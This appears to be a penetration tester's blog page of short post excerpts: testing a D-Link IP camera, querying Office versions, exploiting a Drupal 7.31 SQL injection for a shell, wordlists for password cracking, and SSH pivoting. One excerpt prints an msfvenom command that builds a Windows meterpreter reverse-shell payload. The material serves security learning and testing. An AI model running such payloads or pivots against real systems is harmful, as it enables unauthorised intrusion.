Internet of Things -- D-Link DCS-930L

With the recent talk about hijacking IP cameras for the purposes of creating a bot army, I decided to order a camera.  I'd seen this model or one like it in my local lunch place and I ordered one from Amazon.  Two days later, I got my target, a "D-Link DCS-930L Wi-Fi Camera with Remote Viewing".  Nothing fancy really.  Just a $30 camera that can be used wired or wirelessly, but apparently only good for "day use".  It will serve my purpose though.  Army of one.

Command Line -- Microsoft Office Version

I needed to quickly gather the version of Microsoft Office in a mixed version environment.  Simple enough, let's grab the version of Word:

reg query "HKEY_CLASSES_ROOT\Word.Application\CurVer"

Drupal to Low Priv Shell

There’s a certain feeling of satisfaction when you can manually work your way through exploiting a box.  Not only that, you’ll have a better understanding of what’s really going on under the hood.  You don’t really get that when you’re using automated tools.  Not that I don’t use what’s in the toolbox but given the choice, I will try the manual route first.

I've not seen much of Drupal from either side but I found myself staring at a 7.31 installation and after some quick searches, I realized it was vulnerable to SQL injection.

msfvenom -- Specific Byte Count

I wanted to generate some shell code for an exploit and I used the following command:

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.55.11 LPORT=443 -f js_le -b "\x00\x0a\x0d"

Cewl -- Building Wordlists

I have a wordlist I created from a collection of wordlists I've acquired.  It's not the end-all, be-all wordlist but it's a big one and if you have a weak password, it's in this list.  In fact, if you have a decent password, it's in the list.

It's a good list for banging against passwords to see if they are reasonably secure.  When I attempt to crack a password, I go to the top 10 most used, the top 500 most used, and then 'the' list.  Beyond that, I'm probably going to stop unless I have a different motivation.

SSH Port Forwarding

Network segmentation is common in the enterprise but becoming more common in smaller environments.  If I compromise a box in my local segment and that box has access to another segment, we can use port forwarding to leapfrog across.

The typical example has us making an actual connection which ties up one of our terminal sessions with an open ssh connection.  Fine, we can spawn a bunch of terminal sessions but we can also background it.
